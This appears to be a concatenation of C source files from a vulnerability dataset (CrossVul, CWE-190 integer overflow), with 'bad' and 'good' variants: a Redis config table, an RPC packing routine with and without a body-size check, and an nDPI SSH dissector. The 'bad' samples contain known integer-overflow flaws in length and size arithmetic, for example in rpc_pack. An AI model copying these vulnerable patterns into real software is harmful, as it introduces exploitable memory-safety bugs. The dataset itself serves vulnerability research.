createIntConfig("active-defrag-cycle-max", NULL, MODIFIABLE_CONFIG, 1, 99, server.active_defrag_cycle_max, 25, INTEGER_CONFIG, NULL, NULL), /* Default: 25% CPU max (at upper threshold) */
createIntConfig("active-defrag-threshold-lower", NULL, MODIFIABLE_CONFIG, 0, 1000, server.active_defrag_threshold_lower, 10, INTEGER_CONFIG, NULL, NULL), /* Default: don't defrag when fragmentation is below 10% */
createIntConfig("active-defrag-threshold-upper", NULL, MODIFIABLE_CONFIG, 0, 1000, server.active_defrag_threshold_upper, 100, INTEGER_CONFIG, NULL, NULL), /* Default: maximum defrag force at 100% fragmentation */
createIntConfig("lfu-log-factor", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.lfu_log_factor, 10, INTEGER_CONFIG, NULL, NULL),
createIntConfig("lfu-decay-time", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.lfu_decay_time, 1, INTEGER_CONFIG, NULL, NULL),
createIntConfig("replica-priority", "slave-priority", MODIFIABLE_CONFIG, 0, INT_MAX, server.slave_priority, 100, INTEGER_CONFIG, NULL, NULL),
createIntConfig("repl-diskless-sync-delay", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.repl_diskless_sync_delay, 5, INTEGER_CONFIG, NULL, NULL),
createIntConfig("maxmemory-samples", NULL, MODIFIABLE_CONFIG, 1, INT_MAX, server.maxmemory_samples, 5, INTEGER_CONFIG, NULL, NULL),
createIntConfig("timeout", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.maxidletime, 0, INTEGER_CONFIG, NULL, NULL), /* Default client timeout: infinite */
createIntConfig("replica-announce-port", "slave-announce-port", MODIFIABLE_CONFIG, 0, 65535, server.slave_announce_port, 0, INTEGER_CONFIG, NULL, NULL),
createIntConfig("tcp-backlog", NULL, IMMUTABLE_CONFIG, 0, INT_MAX, server.tcp_backlog, 511, INTEGER_CONFIG, NULL, NULL), /* TCP listen backlog. */
createIntConfig("cluster-announce-bus-port", NULL, MODIFIABLE_CONFIG, 0, 65535, server.cluster_announce_bus_port, 0, INTEGER_CONFIG, NULL, NULL), /* Default: Use +10000 offset. */
createIntConfig("cluster-announce-port", NULL, MODIFIABLE_CONFIG, 0, 65535, server.cluster_announce_port, 0, INTEGER_CONFIG, NULL, NULL), /* Use server.port */
createIntConfig("repl-timeout", NULL, MODIFIABLE_CONFIG, 1, INT_MAX, server.repl_timeout, 60, INTEGER_CONFIG, NULL, NULL),
createIntConfig("repl-ping-replica-period", "repl-ping-slave-period", MODIFIABLE_CONFIG, 1, INT_MAX, server.repl_ping_slave_period, 10, INTEGER_CONFIG, NULL, NULL),
createIntConfig("list-compress-depth", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.list_compress_depth, 0, INTEGER_CONFIG, NULL, NULL),
createIntConfig("rdb-key-save-delay", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.rdb_key_save_delay, 0, INTEGER_CONFIG, NULL, NULL),
createIntConfig("key-load-delay", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.key_load_delay, 0, INTEGER_CONFIG, NULL, NULL),
createIntConfig("active-expire-effort", NULL, MODIFIABLE_CONFIG, 1, 10, server.active_expire_effort, 1, INTEGER_CONFIG, NULL, NULL), /* From 1 to 10. */
createIntConfig("hz", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.config_hz, CONFIG_DEFAULT_HZ, INTEGER_CONFIG, NULL, updateHZ),
createIntConfig("min-replicas-to-write", "min-slaves-to-write", MODIFIABLE_CONFIG, 0, INT_MAX, server.repl_min_slaves_to_write, 0, INTEGER_CONFIG, NULL, updateGoodSlaves),
createIntConfig("min-replicas-max-lag", "min-slaves-max-lag", MODIFIABLE_CONFIG, 0, INT_MAX, server.repl_min_slaves_max_lag, 10, INTEGER_CONFIG, NULL, updateGoodSlaves),
/* Unsigned int configs */
createUIntConfig("maxclients", NULL, MODIFIABLE_CONFIG, 1, UINT_MAX, server.maxclients, 10000, INTEGER_CONFIG, NULL, updateMaxclients),
/* Unsigned Long configs */
createULongConfig("active-defrag-max-scan-fields", NULL, MODIFIABLE_CONFIG, 1, LONG_MAX, server.active_defrag_max_scan_fields, 1000, INTEGER_CONFIG, NULL, NULL), /* Default: keys with more than 1000 fields will be processed separately */
createULongConfig("slowlog-max-len", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.slowlog_max_len, 128, INTEGER_CONFIG, NULL, NULL),
createULongConfig("acllog-max-len", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.acllog_max_len, 128, INTEGER_CONFIG, NULL, NULL),
/* Long Long configs */
createLongLongConfig("lua-time-limit", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.lua_time_limit, 5000, INTEGER_CONFIG, NULL, NULL),/* milliseconds */
createLongLongConfig("cluster-node-timeout", NULL, MODIFIABLE_CONFIG, 0, LLONG_MAX, server.cluster_node_timeout, 15000, INTEGER_CONFIG, NULL, NULL),
createLongLongConfig("slowlog-log-slower-than", NULL, MODIFIABLE_CONFIG, -1, LLONG_MAX, server.slowlog_log_slower_than, 10000, INTEGER_CONFIG, NULL, NULL),
createLongLongConfig("latency-monitor-threshold", NULL, MODIFIABLE_CONFIG, 0, LLONG_MAX, server.latency_monitor_threshold, 0, INTEGER_CONFIG, NULL, NULL),
createLongLongConfig("proto-max-bulk-len", NULL, MODIFIABLE_CONFIG, 1024*1024, LLONG_MAX, server.proto_max_bulk_len, 512ll*1024*1024, MEMORY_CONFIG, NULL, NULL), /* Bulk request max size */
createLongLongConfig("stream-node-max-entries", NULL, MODIFIABLE_CONFIG, 0, LLONG_MAX, server.stream_node_max_entries, 100, INTEGER_CONFIG, NULL, NULL),
createLongLongConfig("repl-backlog-size", NULL, MODIFIABLE_CONFIG, 1, LLONG_MAX, server.repl_backlog_size, 1024*1024, MEMORY_CONFIG, NULL, updateReplBacklogSize), /* Default: 1mb */
/* Unsigned Long Long configs */
createULongLongConfig("maxmemory", NULL, MODIFIABLE_CONFIG, 0, ULLONG_MAX, server.maxmemory, 0, MEMORY_CONFIG, NULL, updateMaxmemory),
/* Size_t configs */
createSizeTConfig("hash-max-ziplist-entries", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.hash_max_ziplist_entries, 512, INTEGER_CONFIG, NULL, NULL),
createSizeTConfig("set-max-intset-entries", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.set_max_intset_entries, 512, INTEGER_CONFIG, NULL, NULL),
createSizeTConfig("zset-max-ziplist-entries", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.zset_max_ziplist_entries, 128, INTEGER_CONFIG, NULL, NULL),
createSizeTConfig("active-defrag-ignore-bytes", NULL, MODIFIABLE_CONFIG, 1, LLONG_MAX, server.active_defrag_ignore_bytes, 100<<20, MEMORY_CONFIG, NULL, NULL), /* Default: don't defrag if frag overhead is below 100mb */
createSizeTConfig("hash-max-ziplist-value", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.hash_max_ziplist_value, 64, MEMORY_CONFIG, NULL, NULL),
createSizeTConfig("stream-node-max-bytes", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.stream_node_max_bytes, 4096, MEMORY_CONFIG, NULL, NULL),
createSizeTConfig("zset-max-ziplist-value", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.zset_max_ziplist_value, 64, MEMORY_CONFIG, NULL, NULL),
createSizeTConfig("hll-sparse-max-bytes", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.hll_sparse_max_bytes, 3000, MEMORY_CONFIG, NULL, NULL),
createSizeTConfig("tracking-table-max-keys", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.tracking_table_max_keys, 1000000, INTEGER_CONFIG, NULL, NULL), /* Default: 1 million keys max. */
/* Other configs */
createTimeTConfig("repl-backlog-ttl", NULL, MODIFIABLE_CONFIG, 0, LONG_MAX, server.repl_backlog_time_limit, 60*60, INTEGER_CONFIG, NULL, NULL), /* Default: 1 hour */
createOffTConfig("auto-aof-rewrite-min-size", NULL, MODIFIABLE_CONFIG, 0, LLONG_MAX, server.aof_rewrite_min_size, 64*1024*1024, MEMORY_CONFIG, NULL, NULL),
#ifdef USE_OPENSSL
createIntConfig("tls-port", NULL, IMMUTABLE_CONFIG, 0, 65535, server.tls_port, 0, INTEGER_CONFIG, NULL, updateTlsCfgInt), /* TCP port. */
createIntConfig("tls-session-cache-size", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.tls_ctx_config.session_cache_size, 20*1024, INTEGER_CONFIG, NULL, updateTlsCfgInt),
createIntConfig("tls-session-cache-timeout", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.tls_ctx_config.session_cache_timeout, 300, INTEGER_CONFIG, NULL, updateTlsCfgInt),
createBoolConfig("tls-cluster", NULL, MODIFIABLE_CONFIG, server.tls_cluster, 0, NULL, updateTlsCfgBool),
createBoolConfig("tls-replication", NULL, MODIFIABLE_CONFIG, server.tls_replication, 0, NULL, updateTlsCfgBool),
createEnumConfig("tls-auth-clients", NULL, MODIFIABLE_CONFIG, tls_auth_clients_enum, server.tls_auth_clients, TLS_CLIENT_AUTH_YES, NULL, NULL),
createBoolConfig("tls-prefer-server-ciphers", NULL, MODIFIABLE_CONFIG, server.tls_ctx_config.prefer_server_ciphers, 0, NULL, updateTlsCfgBool),
createBoolConfig("tls-session-caching", NULL, MODIFIABLE_CONFIG, server.tls_ctx_config.session_caching, 1, NULL, updateTlsCfgBool),
createStringConfig("tls-cert-file", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.cert_file, NULL, NULL, updateTlsCfg),
createStringConfig("tls-key-file", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.key_file, NULL, NULL, updateTlsCfg),
createStringConfig("tls-dh-params-file", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.dh_params_file, NULL, NULL, updateTlsCfg),
createStringConfig("tls-ca-cert-file", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.ca_cert_file, NULL, NULL, updateTlsCfg),
createStringConfig("tls-ca-cert-dir", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.ca_cert_dir, NULL, NULL, updateTlsCfg),
createStringConfig("tls-protocols", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.protocols, NULL, NULL, updateTlsCfg),
createStringConfig("tls-ciphers", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.ciphers, NULL, NULL, updateTlsCfg),
createStringConfig("tls-ciphersuites", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.tls_ctx_config.ciphersuites, NULL, NULL, updateTlsCfg),
#endif
/* NULL Terminator */
{NULL}
};
/*-----------------------------------------------------------------------------
* CONFIG command entry point
*----------------------------------------------------------------------------*/
void configCommand(client *c) {
/* Only allow CONFIG GET while loading. */
if (server.loading && strcasecmp(c->argv[1]->ptr,"get")) {
addReplyError(c,"Only CONFIG GET is allowed during loading");
return;
}
if (c->argc == 2 && !strcasecmp(c->argv[1]->ptr,"help")) {
const char *help[] = {
"GET <pattern> -- Return parameters matching the glob-like <pattern> and their values.",
"SET <parameter> <value> -- Set parameter to value.",
"RESETSTAT -- Reset statistics reported by INFO.",
"REWRITE -- Rewrite the configuration file.",
NULL
};
addReplyHelp(c, help);
} else if (!strcasecmp(c->argv[1]->ptr,"set") && c->argc == 4) {
configSetCommand(c);
} else if (!strcasecmp(c->argv[1]->ptr,"get") && c->argc == 3) {
configGetCommand(c);
} else if (!strcasecmp(c->argv[1]->ptr,"resetstat") && c->argc == 2) {
resetServerStats();
resetCommandTableStats();
addReply(c,shared.ok);
} else if (!strcasecmp(c->argv[1]->ptr,"rewrite") && c->argc == 2) {
if (server.configfile == NULL) {
addReplyError(c,"The server is running without a config file");
return;
}
if (rewriteConfig(server.configfile, 0) == -1) {
serverLog(LL_WARNING,"CONFIG REWRITE failed: %s", strerror(errno));
addReplyErrorFormat(c,"Rewriting config file: %s", strerror(errno));
} else {
serverLog(LL_WARNING,"CONFIG REWRITE executed with success.");
addReply(c,shared.ok);
}
} else {
addReplySubcommandSyntaxError(c);
return;
}
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_1943_0 |
crossvul-cpp_data_bad_400_1 | /*
* Description:
* History: yang@haipo.me, 2016/03/30, create
*/
# include <stdlib.h>
# include <assert.h>
# include "ut_rpc.h"
# include "ut_crc32.h"
# include "ut_misc.h"
int rpc_decode(nw_ses *ses, void *data, size_t max)
{
if (max < RPC_PKG_HEAD_SIZE)
return 0;
rpc_pkg *pkg = data;
if (le32toh(pkg->magic) != RPC_PKG_MAGIC)
return -1;
uint32_t pkg_size = RPC_PKG_HEAD_SIZE + le16toh(pkg->ext_size) + le32toh(pkg->body_size);
if (max < pkg_size)
return 0;
uint32_t crc32 = le32toh(pkg->crc32);
pkg->crc32 = 0;
if (crc32 != generate_crc32c(data, pkg_size))
return -3;
pkg->crc32 = crc32;
pkg->magic = le32toh(pkg->magic);
pkg->command = le32toh(pkg->command);
pkg->pkg_type = le16toh(pkg->pkg_type);
pkg->result = le32toh(pkg->result);
pkg->sequence = le32toh(pkg->sequence);
pkg->req_id = le64toh(pkg->req_id);
pkg->body_size = le32toh(pkg->body_size);
pkg->ext_size = le16toh(pkg->ext_size);
return pkg_size;
}
int rpc_pack(rpc_pkg *pkg, void **data, uint32_t *size)
{
static void *send_buf;
static size_t send_buf_size;
uint32_t pkg_size = RPC_PKG_HEAD_SIZE + pkg->ext_size + pkg->body_size;
if (send_buf_size < pkg_size) {
if (send_buf)
free(send_buf);
send_buf_size = pkg_size * 2;
send_buf = malloc(send_buf_size);
assert(send_buf != NULL);
}
memcpy(send_buf, pkg, RPC_PKG_HEAD_SIZE);
if (pkg->ext_size)
memcpy(send_buf + RPC_PKG_HEAD_SIZE, pkg->ext, pkg->ext_size);
if (pkg->body_size)
memcpy(send_buf + RPC_PKG_HEAD_SIZE + pkg->ext_size, pkg->body, pkg->body_size);
pkg = send_buf;
pkg->magic = htole32(RPC_PKG_MAGIC);
pkg->command = htole32(pkg->command);
pkg->pkg_type = htole16(pkg->pkg_type);
pkg->result = htole32(pkg->result);
pkg->sequence = htole32(pkg->sequence);
pkg->req_id = htole64(pkg->req_id);
pkg->body_size = htole32(pkg->body_size);
pkg->ext_size = htole16(pkg->ext_size);
pkg->crc32 = 0;
pkg->crc32 = htole32(generate_crc32c(send_buf, pkg_size));
*data = send_buf;
*size = pkg_size;
return 0;
}
int rpc_send(nw_ses *ses, rpc_pkg *pkg)
{
void *data;
uint32_t size;
int ret = rpc_pack(pkg, &data, &size);
if (ret < 0)
return ret;
return nw_ses_send(ses, data, size);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_400_1 |
crossvul-cpp_data_bad_3973_0 | /*
* ssh.c
*
* Copyright (C) 2009-2011 by ipoque GmbH
* Copyright (C) 2011-20 - ntop.org
*
* This file is part of nDPI, an open source deep packet inspection
* library based on the OpenDPI and PACE technology by ipoque GmbH
*
* nDPI is free software: you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* nDPI is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with nDPI. If not, see <http://www.gnu.org/licenses/>.
*
*/
#include "ndpi_protocol_ids.h"
#define NDPI_CURRENT_PROTO NDPI_PROTOCOL_SSH
#include "ndpi_api.h"
#include "ndpi_md5.h"
/*
HASSH - https://github.com/salesforce/hassh
https://github.com/salesforce/hassh/blob/master/python/hassh.py
[server]
skex = packet.ssh.kex_algorithms
seastc = packet.ssh.encryption_algorithms_server_to_client
smastc = packet.ssh.mac_algorithms_server_to_client
scastc = packet.ssh.compression_algorithms_server_to_client
hasshs_str = ';'.join([skex, seastc, smastc, scastc])
[client]
ckex = packet.ssh.kex_algorithms
ceacts = packet.ssh.encryption_algorithms_client_to_server
cmacts = packet.ssh.mac_algorithms_client_to_server
ccacts = packet.ssh.compression_algorithms_client_to_server
hassh_str = ';'.join([ckex, ceacts, cmacts, ccacts])
NOTE
THe ECDSA key fingerprint is SHA256 -> ssh.kex.h_sig (wireshark)
is in the Message Code: Diffie-Hellman Key Exchange Reply (31)
that usually is packet 14
*/
/* #define SSH_DEBUG 1 */
static void ndpi_search_ssh_tcp(struct ndpi_detection_module_struct *ndpi_struct, struct ndpi_flow_struct *flow);
/* ************************************************************************ */
static int search_ssh_again(struct ndpi_detection_module_struct *ndpi_struct, struct ndpi_flow_struct *flow) {
ndpi_search_ssh_tcp(ndpi_struct, flow);
if((flow->protos.ssh.hassh_client[0] != '\0')
&& (flow->protos.ssh.hassh_server[0] != '\0')) {
/* stop extra processing */
flow->extra_packets_func = NULL; /* We're good now */
return(0);
}
/* Possibly more processing */
return(1);
}
/* ************************************************************************ */
static void ndpi_int_ssh_add_connection(struct ndpi_detection_module_struct
*ndpi_struct, struct ndpi_flow_struct *flow) {
if(flow->extra_packets_func != NULL)
return;
flow->guessed_host_protocol_id = flow->guessed_protocol_id = NDPI_PROTOCOL_SSH;
/* This is necessary to inform the core to call this dissector again */
flow->check_extra_packets = 1;
flow->max_extra_packets_to_check = 12;
flow->extra_packets_func = search_ssh_again;
ndpi_set_detected_protocol(ndpi_struct, flow, NDPI_PROTOCOL_SSH, NDPI_PROTOCOL_UNKNOWN);
}
/* ************************************************************************ */
static u_int16_t concat_hash_string(struct ndpi_packet_struct *packet,
char *buf, u_int8_t client_hash) {
u_int16_t offset = 22, buf_out_len = 0;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
u_int32_t len = ntohl(*(u_int32_t*)&packet->payload[offset]);
offset += 4;
/* -1 for ';' */
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
/* ssh.kex_algorithms [C/S] */
strncpy(buf, (const char *)&packet->payload[offset], buf_out_len = len);
buf[buf_out_len++] = ';';
offset += len;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
/* ssh.server_host_key_algorithms [None] */
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
offset += 4 + len;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
/* ssh.encryption_algorithms_client_to_server [C] */
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
if(client_hash) {
offset += 4;
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
strncpy(&buf[buf_out_len], (const char *)&packet->payload[offset], len);
buf_out_len += len;
buf[buf_out_len++] = ';';
offset += len;
} else
offset += 4 + len;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
/* ssh.encryption_algorithms_server_to_client [S] */
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
if(!client_hash) {
offset += 4;
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
strncpy(&buf[buf_out_len], (const char *)&packet->payload[offset], len);
buf_out_len += len;
buf[buf_out_len++] = ';';
offset += len;
} else
offset += 4 + len;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
/* ssh.mac_algorithms_client_to_server [C] */
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
if(client_hash) {
offset += 4;
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
strncpy(&buf[buf_out_len], (const char *)&packet->payload[offset], len);
buf_out_len += len;
buf[buf_out_len++] = ';';
offset += len;
} else
offset += 4 + len;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
/* ssh.mac_algorithms_server_to_client [S] */
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
if(!client_hash) {
offset += 4;
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
strncpy(&buf[buf_out_len], (const char *)&packet->payload[offset], len);
buf_out_len += len;
buf[buf_out_len++] = ';';
offset += len;
} else
offset += 4 + len;
/* ssh.compression_algorithms_client_to_server [C] */
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
if(client_hash) {
offset += 4;
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
strncpy(&buf[buf_out_len], (const char *)&packet->payload[offset], len);
buf_out_len += len;
offset += len;
} else
offset += 4 + len;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
/* ssh.compression_algorithms_server_to_client [S] */
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
if(!client_hash) {
offset += 4;
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
strncpy(&buf[buf_out_len], (const char *)&packet->payload[offset], len);
buf_out_len += len;
offset += len;
} else
offset += 4 + len;
/* ssh.languages_client_to_server [None] */
/* ssh.languages_server_to_client [None] */
#ifdef SSH_DEBUG
printf("[SSH] %s\n", buf);
#endif
return(buf_out_len);
invalid_payload:
#ifdef SSH_DEBUG
printf("[SSH] Invalid packet payload\n");
#endif
return(0);
}
/* ************************************************************************ */
static void ndpi_ssh_zap_cr(char *str, int len) {
len--;
while(len > 0) {
if((str[len] == '\n') || (str[len] == '\r')) {
str[len] = '\0';
len--;
} else
break;
}
}
/* ************************************************************************ */
static void ndpi_search_ssh_tcp(struct ndpi_detection_module_struct *ndpi_struct, struct ndpi_flow_struct *flow) {
struct ndpi_packet_struct *packet = &flow->packet;
#ifdef SSH_DEBUG
printf("[SSH] %s()\n", __FUNCTION__);
#endif
if(flow->l4.tcp.ssh_stage == 0) {
if(packet->payload_packet_len > 7 && packet->payload_packet_len < 100
&& memcmp(packet->payload, "SSH-", 4) == 0) {
int len = ndpi_min(sizeof(flow->protos.ssh.client_signature)-1, packet->payload_packet_len);
strncpy(flow->protos.ssh.client_signature, (const char *)packet->payload, len);
flow->protos.ssh.client_signature[len] = '\0';
ndpi_ssh_zap_cr(flow->protos.ssh.client_signature, len);
#ifdef SSH_DEBUG
printf("[SSH] [client_signature: %s]\n", flow->protos.ssh.client_signature);
#endif
NDPI_LOG_DBG2(ndpi_struct, "ssh stage 0 passed\n");
flow->l4.tcp.ssh_stage = 1 + packet->packet_direction;
ndpi_int_ssh_add_connection(ndpi_struct, flow);
return;
}
} else if(flow->l4.tcp.ssh_stage == (2 - packet->packet_direction)) {
if(packet->payload_packet_len > 7 && packet->payload_packet_len < 500
&& memcmp(packet->payload, "SSH-", 4) == 0) {
int len = ndpi_min(sizeof(flow->protos.ssh.server_signature)-1, packet->payload_packet_len);
strncpy(flow->protos.ssh.server_signature, (const char *)packet->payload, len);
flow->protos.ssh.server_signature[len] = '\0';
ndpi_ssh_zap_cr(flow->protos.ssh.server_signature, len);
#ifdef SSH_DEBUG
printf("[SSH] [server_signature: %s]\n", flow->protos.ssh.server_signature);
#endif
NDPI_LOG_DBG2(ndpi_struct, "ssh stage 1 passed\n");
flow->guessed_host_protocol_id = flow->guessed_protocol_id = NDPI_PROTOCOL_SSH;
#ifdef SSH_DEBUG
printf("[SSH] [completed stage: %u]\n", flow->l4.tcp.ssh_stage);
#endif
flow->l4.tcp.ssh_stage = 3;
return;
}
} else if(packet->payload_packet_len > 5) {
u_int8_t msgcode = *(packet->payload + 5);
ndpi_MD5_CTX ctx;
if(msgcode == 20 /* key exchange init */) {
char *hassh_buf = ndpi_calloc(packet->payload_packet_len, sizeof(char));
u_int i, len;
#ifdef SSH_DEBUG
printf("[SSH] [stage: %u][msg: %u][direction: %u][key exchange init]\n", flow->l4.tcp.ssh_stage, msgcode, packet->packet_direction);
#endif
if(hassh_buf) {
if(packet->packet_direction == 0 /* client */) {
u_char fingerprint_client[16];
len = concat_hash_string(packet, hassh_buf, 1 /* client */);
ndpi_MD5Init(&ctx);
ndpi_MD5Update(&ctx, (const unsigned char *)hassh_buf, len);
ndpi_MD5Final(fingerprint_client, &ctx);
#ifdef SSH_DEBUG
{
printf("[SSH] [client][%s][", hassh_buf);
for(i=0; i<16; i++) printf("%02X", fingerprint_client[i]);
printf("]\n");
}
#endif
for(i=0; i<16; i++) sprintf(&flow->protos.ssh.hassh_client[i*2], "%02X", fingerprint_client[i] & 0xFF);
flow->protos.ssh.hassh_client[32] = '\0';
} else {
u_char fingerprint_server[16];
len = concat_hash_string(packet, hassh_buf, 0 /* server */);
ndpi_MD5Init(&ctx);
ndpi_MD5Update(&ctx, (const unsigned char *)hassh_buf, len);
ndpi_MD5Final(fingerprint_server, &ctx);
#ifdef SSH_DEBUG
{
printf("[SSH] [server][%s][", hassh_buf);
for(i=0; i<16; i++) printf("%02X", fingerprint_server[i]);
printf("]\n");
}
#endif
for(i=0; i<16; i++) sprintf(&flow->protos.ssh.hassh_server[i*2], "%02X", fingerprint_server[i] & 0xFF);
flow->protos.ssh.hassh_server[32] = '\0';
}
ndpi_free(hassh_buf);
}
ndpi_int_ssh_add_connection(ndpi_struct, flow);
}
if((flow->protos.ssh.hassh_client[0] != '\0') && (flow->protos.ssh.hassh_server[0] != '\0')) {
#ifdef SSH_DEBUG
printf("[SSH] Dissection completed\n");
#endif
flow->extra_packets_func = NULL; /* We're good now */
}
return;
}
#ifdef SSH_DEBUG
printf("[SSH] Excluding SSH");
#endif
NDPI_LOG_DBG(ndpi_struct, "excluding ssh at stage %d\n", flow->l4.tcp.ssh_stage);
NDPI_ADD_PROTOCOL_TO_BITMASK(flow->excluded_protocol_bitmask, NDPI_PROTOCOL_SSH);
}
/* ************************************************************************ */
void init_ssh_dissector(struct ndpi_detection_module_struct *ndpi_struct, u_int32_t *id, NDPI_PROTOCOL_BITMASK *detection_bitmask)
{
ndpi_set_bitmask_protocol_detection("SSH", ndpi_struct, detection_bitmask, *id,
NDPI_PROTOCOL_SSH,
ndpi_search_ssh_tcp,
NDPI_SELECTION_BITMASK_PROTOCOL_V4_V6_TCP_WITH_PAYLOAD_WITHOUT_RETRANSMISSION,
SAVE_DETECTION_BITMASK_AS_UNKNOWN,
ADD_TO_DETECTION_BITMASK);
*id += 1;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3973_0 |
crossvul-cpp_data_good_400_1 | /*
* Description:
* History: yang@haipo.me, 2016/03/30, create
*/
# include <stdlib.h>
# include <assert.h>
# include "ut_rpc.h"
# include "ut_crc32.h"
# include "ut_misc.h"
int rpc_decode(nw_ses *ses, void *data, size_t max)
{
if (max < RPC_PKG_HEAD_SIZE)
return 0;
rpc_pkg *pkg = data;
if (le32toh(pkg->magic) != RPC_PKG_MAGIC)
return -1;
uint32_t pkg_size = RPC_PKG_HEAD_SIZE + le16toh(pkg->ext_size) + le32toh(pkg->body_size);
if (max < pkg_size)
return 0;
uint32_t crc32 = le32toh(pkg->crc32);
pkg->crc32 = 0;
if (crc32 != generate_crc32c(data, pkg_size))
return -3;
pkg->crc32 = crc32;
pkg->magic = le32toh(pkg->magic);
pkg->command = le32toh(pkg->command);
pkg->pkg_type = le16toh(pkg->pkg_type);
pkg->result = le32toh(pkg->result);
pkg->sequence = le32toh(pkg->sequence);
pkg->req_id = le64toh(pkg->req_id);
pkg->body_size = le32toh(pkg->body_size);
pkg->ext_size = le16toh(pkg->ext_size);
return pkg_size;
}
int rpc_pack(rpc_pkg *pkg, void **data, uint32_t *size)
{
static void *send_buf;
static size_t send_buf_size;
uint32_t pkg_size;
if (pkg->body_size > RPC_PKG_MAX_BODY_SIZE) {
return -1;
}
pkg_size = RPC_PKG_HEAD_SIZE + pkg->ext_size + pkg->body_size;
if (send_buf_size < pkg_size) {
if (send_buf)
free(send_buf);
send_buf_size = pkg_size * 2;
send_buf = malloc(send_buf_size);
if (send_buf == NULL) {
return -1;
}
}
memcpy(send_buf, pkg, RPC_PKG_HEAD_SIZE);
if (pkg->ext_size)
memcpy(send_buf + RPC_PKG_HEAD_SIZE, pkg->ext, pkg->ext_size);
if (pkg->body_size)
memcpy(send_buf + RPC_PKG_HEAD_SIZE + pkg->ext_size, pkg->body, pkg->body_size);
pkg = send_buf;
pkg->magic = htole32(RPC_PKG_MAGIC);
pkg->command = htole32(pkg->command);
pkg->pkg_type = htole16(pkg->pkg_type);
pkg->result = htole32(pkg->result);
pkg->sequence = htole32(pkg->sequence);
pkg->req_id = htole64(pkg->req_id);
pkg->body_size = htole32(pkg->body_size);
pkg->ext_size = htole16(pkg->ext_size);
pkg->crc32 = 0;
pkg->crc32 = htole32(generate_crc32c(send_buf, pkg_size));
*data = send_buf;
*size = pkg_size;
return 0;
}
int rpc_send(nw_ses *ses, rpc_pkg *pkg)
{
void *data;
uint32_t size;
int ret = rpc_pack(pkg, &data, &size);
if (ret < 0)
return ret;
return nw_ses_send(ses, data, size);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_400_1 |
crossvul-cpp_data_bad_131_0 | /*
** {======================================================
** Library for packing/unpacking structures.
** $Id: struct.c,v 1.7 2018/05/11 22:04:31 roberto Exp $
** See Copyright Notice at the end of this file
** =======================================================
*/
/*
** Valid formats:
** > - big endian
** < - little endian
** ![num] - alignment
** x - pading
** b/B - signed/unsigned byte
** h/H - signed/unsigned short
** l/L - signed/unsigned long
** T - size_t
